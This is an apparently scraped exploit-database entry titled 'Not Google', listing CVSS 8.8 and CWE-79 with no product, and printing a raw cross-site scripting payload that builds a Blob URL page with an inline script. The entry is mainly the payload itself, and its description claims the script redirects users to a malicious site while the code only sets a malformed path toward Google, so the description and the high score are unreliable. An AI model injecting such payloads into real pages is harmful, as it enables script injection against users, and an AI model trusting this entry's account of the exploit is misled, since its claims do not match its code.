Vendor: N/A
By: Anonymous
CVSS: 8,8 (HIGH)
CWE: 79 - Cross-site Scripting (XSS)
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Not Google

This exploit uses a malicious script to redirect users to a malicious website if they are not on Google.com. If they are on Google.com, the title of the page is changed to 'Google Search'.

Mitigation:

Input validation and output encoding should be used to prevent XSS attacks.

Exploit-DB raw data:

<script>
location=URL.createObjectURL(new Blob(['<b>Not Google</b><script>if(location.href.indexOf("google")==-1){location.pathname="https://www.google.com/"}else{document.title="Google Search"}<\/script>'], {type: 'text/html'}))
</script>